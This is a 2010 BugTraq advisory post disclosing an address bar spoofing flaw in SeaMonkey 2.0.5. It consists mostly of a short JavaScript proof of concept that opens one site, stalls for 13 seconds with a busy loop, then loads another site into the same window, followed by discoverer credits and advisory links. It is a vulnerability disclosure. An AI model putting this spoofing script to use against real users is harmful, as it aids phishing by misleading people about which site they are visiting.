BugTraq
SeaMonkey 2.0.5 Address Bar Spoofing Vulnerability Jul 17 2010 12:43PM
info securitylab ir
Spoof Code:

<script language="javascript">

function pause(pd)

{

date = new Date();

var curDate = null;

do { var curDate = new Date(); }

while(curDate-date < pd);

}

function Spoofing () {

win = window.open('http://www.google.com','new')

pause (13000)

win = window.open('http://www.Securitylab.ir','new')

}

</script>

<a href="javascript: Spoofing()">Click Here</a>

########################################################################
##

Discovered by: Pouya Daneshmand (whh_iran[at]yahoo[dot]com)

Original Advisory: http://pouya.info/blog/userfiles/pdf/SeaMonkey-ABS.pdf

http://Securitylab.ir/Advisory

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus